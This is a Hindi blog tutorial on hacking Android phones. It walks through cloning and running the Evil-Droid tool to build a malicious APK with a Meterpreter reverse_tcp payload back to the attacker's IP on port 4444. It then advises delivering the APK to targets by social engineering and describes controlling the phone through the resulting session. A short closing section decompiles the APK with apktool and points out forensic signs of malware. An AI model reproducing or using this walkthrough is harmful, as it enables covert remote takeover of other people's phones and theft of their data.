Android एक ओपन सोर्स प्लेटफॉर्म है; कोई भी डेवलपर अपने विचारों को एक नए एप्लिकेशन में बदल सकता है, जो डेवलपर्स और उपयोगकर्ताओं दोनों के लिए एक बड़ा फायदा है, जिन्होंने सॉफ्टवेयर के इन टुकड़ों को अपने दैनिक जीवन का हिस्सा बना लिया है।
इसका व्यापक उपयोग Android को कई कार्यों की पेशकश करता है, हालांकि इसने कमजोरियों का फायदा उठाने का द्वार भी खोल दिया है। इस ऑपरेटिंग सिस्टम में कई खामियां हैं जिनका फायदा उठाने के लिए हैकर्स पीड़ितों से संवेदनशील जानकारी निकालने की कोशिश करेंगे। Common Vulnerability Exposure (CVE) के अनुसार, विभिन्न आक्रमण तकनीकों का पालन करके एंड्रॉइड सुरक्षा उपायों को बायपास करना संभव है।
एंड्राइड मोबाइल कैसे हैक करे? | Android Mobile Hack Kaise Kare?
- Evil Droid को Kali Linux 2018.4 amd64 . पर स्थापित किया गया है
- क्लोन करने के लिए, git clone https://github.com/M4sc3r4n0/Evil-Droid.git
- cd Evil-Droid टाइप करें
- टाइप करें chmod u + x evil-droid
- टाइप करें ./evil-droid
- 1 Write
- MSF APK शुरू करने के लिए
- local IP address (हमलावर का आईपी पता) दर्ज करें 192.168.1.5
- Enter the port number to listen on
- Type 4444
- malicious APK का नाम दर्ज करें। इस मामले में, टाइप करें testapk
- Select android / meterpreter / reverse_tcp
- Multi handler चुनें
- फिर ओके पर क्लिक करें
- Evil Droid ने malicious APK बनाया है। अब आप सोशल इंजीनियरिंग द्वारा लक्ष्य चुनकर एपीके सबमिट कर सकते हैं। परीक्षण के लिए Android 4.4 iso का उपयोग किया गया था। Android 4.4 यहां से डाउनलोड करें : https://sourceforge.net/projects/android-x86/files/latest/download
- हमने वीएमवेयर वर्कस्टेशन पर लाइव बूट शुरू कर दिया है
- Android 4.4 . पर malicious APK install करें
- इसे install करने से पहले, यह अनुरोध करेगा कि अज्ञात स्रोतों को स्वीकार किया जाए। इस सुविधा को सक्षम करें और फिर test.apk स्थापित करें
- test.apk Android पर खुलेगा
- Evil Droid श्रोता में एक सत्र बनाया जाएगा। सत्र बनाने और चलाने के लिए एक और टर्मिनल अपने आप खुल जाएगा
- Evil Droid meterpreter, Metasploit’s Meterpreter के समान कमांड प्रदान करता है। आसानी से अपने लक्ष्य में हेरफेर कर सकते हैं
- एक और टेस्ट के लिए हमने Android 7.1 iso का इस्तेमाल किया है। Android 7.1 को यहां से डाउनलोड करें : https://osdn.net/projects/android-x86/downloads/67834/android-x86_64-7.1-r2.iso/
- Android 7.1 . पर malicious test APK installकरें
- इसे install करने से पहले, यह अनुरोध करेगा कि अज्ञात स्रोतों को स्वीकार किया जाए। अज्ञात स्रोतों को चालू करें और फिर test.apk . स्थापित करें
- यह Android में test.apk के रूप में खुलेगा
- Evil Droid श्रोता में एक सत्र बनाया जाएगा
- सत्र बनाने और चलाने के लिए एक और टर्मिनल अपने आप खुल जाएगा
- Evil Droid मीटरप्रेटर, Metasploit’s Meterpreter के समान कमांड प्रदान करता है। आसानी से अपने लक्ष्य में हेरफेर कर सकते हैं
FATRAT का उपयोग करने वाले Android उपकरणों के लिए एक ही शोषण किया जा सकता है। यह समझने के लिए कि यह कैसे काम करता है, FATRAT चरण-दर-चरण ट्यूटोरियल का पालन करें ।
Evil Droid द्वारा उत्पन्न दुर्भावनापूर्ण APK को उलट दें
फ़ाइलों को डीकंपाइल करने के लिए विभिन्न उपकरण हैं, जिनका उपयोग एक एंड्रॉइड ऐप को इंजीनियर करने के लिए किया जाता है। इनमें से सबसे लोकप्रिय टूल APKTOOL है, जो Kali Linux 2018.4 (amd64) पर पूर्व-स्थापित है।
- दूसरा टर्मिनल खोलें और apktool -h . टाइप करें
Unrecognized option: -h Apktool v2.2.2 - a tool for reengineering Android apk files with smali v2.1.3 and baksmali v2.1.3 Copyright 2014 Ryszard Wiśniewski [email protected] Updated by Connor Tumbleson [email protected] usage: apktool -advance,--advanced prints advance information. -version,--version prints the version then exits usage: apktool if|install-framework [options] -p,--frame-path Stores framework files into . -t,--tag Tag frameworks using . usage: apktool d[ecode] [options] -f,--force Force delete destination directory.
- apktool d evil.apk टाइप करें
[email protected]:/home/iicybersecurity/Downloads/Evil-Droid# apktool d evil.apk I: Using Apktool 2.2.2 on evil.apk I: Loading resource table… I: Decoding AndroidManifest.xml with resources… I: Loading resource table from file: I: Regular manifest package… I: Decoding file-resources… I: Decoding values / XMLs… I: Baksmaling classes.dex… I: Copying assets and libs… I: Copying unknown files… I: Copying original files…/root/.local/share/apktool/framework/1.apk
- उपरोक्त क्वेरी को निष्पादित करने के बाद, apktool दुर्भावनापूर्ण एपीके को एक्सएमएल के एक सेट में निकाल देगा। इन एक्सएमएल का उपयोग डिजिटल फोरेंसिक में किया जाता है
- जब हमने आगे देखा, तो हमने पाया कि दुर्भावनापूर्ण एपीके ने यादृच्छिक वर्णमाला नामों के साथ निर्देशिकाएं बनाईं। यदि आप एक सामान्य एप्लिकेशन को स्कैन करते हैं, तो यह उन नामों के साथ कोई यादृच्छिक निर्देशिका नहीं बनाएगा। यह व्यवहार दर्शाता है कि यह एक दुर्भावनापूर्ण APK है
[email protected]:/home/iicybersecurity/Downloads/Evil-Droid# cd /evil/smali/com [email protected]:/home/iicybersecurity/Downloads/Evil-Droid/evil/smali/com# ls jpzqkxcarh
हम आशा करते है कि आपको हमारी यह पोस्ट एंड्राइड मोबाइल कैसे हैक करे? | Android Mobile Hack Kaise Kare पसंद आई होगी| यदि आपको इससे सबन्धित कोई भी सवाल पूछना है तो आप हमें कमेंट करके पूछ सकते हो|
ये भी जाने :-
